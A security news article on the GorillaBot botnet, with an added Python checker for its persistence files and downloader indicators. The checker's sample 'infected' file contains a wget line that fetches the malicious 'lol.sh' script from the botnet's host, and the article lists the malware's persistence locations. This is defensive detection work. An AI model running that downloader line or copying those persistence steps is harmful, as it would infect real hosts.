A DDoS attack is a cyber attack that aims to disrupt the normal functioning of a targeted server, service, or network by flooding it with excessive internet traffic.
This is typically achieved via a network of compromised devices, known as a botnet, which sends numerous requests to the target, exhausting its bandwidth and resources.
NSFocus analysts recently identified a botnet that emerged as king for DDoS attacks with 300,000+ commands and it’s dubbed “GorillaBot.”
GorillaBot Emerged As King For DDoS
In September 2024, the Gorilla Botnet, a modified version of the Mirai malware, launched an unprecedented cyber-attack campaign.
Over a 24-day period, it issued more than 300,000 DDoS attack commands targeting 113 countries; the most affected were:-
- China (20%)
- The United States (19%)
- Canada (16%)
- Germany (6%)
This botnet supports most of the major CPU architectures like ARM, MIPS, x86_64, and x86. Besides this, it utilized several attack methods “UDP Flood (41%),” “ACK BYPASS Flood (24%),” and “VSE Flood (12%).”
Gorilla Botnet targeted various sectors like ‘universities,’ ‘government websites,’ ‘telecommunications,’ ‘banks,’ and ‘gaming platforms.’
It employed encryption algorithms associated with the “KekSec group” to hide crucial information and implemented multiple techniques to maintain long-term control over IoT devices and cloud hosts.
The botnet's infrastructure has five built-in C&C servers, one of which is randomly selected for each connection. Its arsenal comprises '19 different attack vectors,' which NSFocus said illustrates a sophisticated approach.
This emerging threat showcased advanced counter-detection capabilities and also highlighted the “evolving landscape” of cyber threats.
It exploits the ‘Hadoop Yarn RPC’ unauthorized access vulnerability through a function called “yarn_init,” potentially granting attackers elevated privileges.
GorillaBot creates multiple system files and scripts for persistence, listed below:-
- “A ‘custom.service’ file in /etc/systemd/system/ for automatic startup.”
- “Modifications to /etc/inittab, /etc/profile.”
- “/boot/bootcmd for execution on system boot or user login.”
- “A ‘mybinary’ script in /etc/init.d/ with a soft link in /etc/rc.d/rc.local or /etc/rc.conf.”
These mechanisms ensure the automatic download and execution of a malicious script named ‘lol.sh’ from http[:]//pen.gorillafirewall.su/.
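The persistence locations and the downloader strings listed above double as a host-level checklist. The following is an added example, not code from the report or from NSFocus: it checks a snapshot of those paths for files that should not exist on a clean host and for the 'lol.sh' / pen.gorillafirewall.su strings inside the files the malware is said to modify. The sample file contents are constructed for illustration, and the `snapshot_host` helper, which reads the same paths from a live host or a mounted image, is an assumption about how one would collect them.

```python
import os
import re

# Persistence paths the report attributes to GorillaBot. The first two are
# files a clean host normally does not have at all; the rest are legitimate
# files whose contents the malware modifies.
UNEXPECTED_FILES = ("/etc/systemd/system/custom.service", "/etc/init.d/mybinary")
MODIFIED_FILES = ("/etc/inittab", "/etc/profile", "/boot/bootcmd",
                  "/etc/rc.d/rc.local", "/etc/rc.conf")

# Strings tied to the downloader stage described in the report.
INDICATORS = [re.compile(p) for p in
              (r"lol\.sh", r"pen\.gorillafirewall\.su", r"/etc/init\.d/mybinary")]


def check_snapshot(files):
    """files: dict path -> file text (absent or None means file not present).
    Returns findings; empty lists mean nothing suspicious was seen."""
    findings = {"unexpected_files": [], "indicator_hits": []}
    for path in UNEXPECTED_FILES:
        if files.get(path) is not None:
            findings["unexpected_files"].append(path)
    for path in UNEXPECTED_FILES + MODIFIED_FILES:
        text = files.get(path)
        if text is None:
            continue
        for pat in INDICATORS:
            if pat.search(text):
                findings["indicator_hits"].append((path, pat.pattern))
    return findings


def snapshot_host(root="/"):
    """Assumed collector: read the watched paths from a host or mounted image."""
    snap = {}
    for path in UNEXPECTED_FILES + MODIFIED_FILES:
        full = os.path.join(root, path.lstrip("/"))
        try:
            with open(full, encoding="utf-8", errors="replace") as fh:
                snap[path] = fh.read()
        except OSError:
            pass  # missing or unreadable: treated as not present
    return snap


# Constructed samples: one host with two planted artifacts, one clean host.
SAMPLE_INFECTED = {
    "/etc/profile": "# /etc/profile\nexport PATH=/usr/local/bin:$PATH\n"
                    "wget -q http://pen.gorillafirewall.su/lol.sh -O /tmp/lol.sh\n",
    "/etc/init.d/mybinary": "#!/bin/sh\n/tmp/lol.sh &\n",
    "/etc/rc.conf": 'hostname="box"\n',
}
SAMPLE_CLEAN = {"/etc/profile": "# /etc/profile\nexport PATH=/usr/local/bin:$PATH\n"}

if __name__ == "__main__":
    for name, snap in (("infected", SAMPLE_INFECTED), ("clean", SAMPLE_CLEAN)):
        print(name, check_snapshot(snap))
```

On a real system, `check_snapshot(snapshot_host())` runs the same checks against the live paths; an empty result only says these particular artifacts are absent, not that the host is clean.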
The malware also incorporates “anti-honeypot measures,” through which it checks for the existence of the “/proc filesystem” to detect potential security traps.
GorillaBot’s use of specific encryption methods, the ‘lol.sh’ script name, and certain code signatures suggest a possible connection to “KekSec.”